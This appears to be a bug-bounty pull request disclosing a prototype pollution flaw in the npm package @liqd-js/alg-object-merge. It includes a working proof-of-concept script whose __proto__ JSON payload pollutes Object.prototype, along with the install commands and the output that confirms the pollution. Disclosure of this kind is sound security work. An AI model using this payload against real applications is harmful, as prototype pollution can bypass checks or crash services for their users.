### PR TITLE
Prototype Pollution in @liqd-js/alg-object-merge

### DIFF
--- a/bounties/npm/@liqd-js/alg-object-merge/1/README.md
+++ b/bounties/npm/@liqd-js/alg-object-merge/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`@liqd-js/alg-object-merge` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+// poc.js
+var algObjectMerge = require("@liqd-js/alg-object-merge")
+const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
+var obj = {}
+console.log("Before : " + {}.polluted);
+algObjectMerge(obj, payload);
+console.log("After : " + {}.polluted);
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i @liqd-js/alg-object-merge # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```


### PR DESCRIPTION
`@liqd-js/alg-object-merge` is vulnerable to `Prototype Pollution`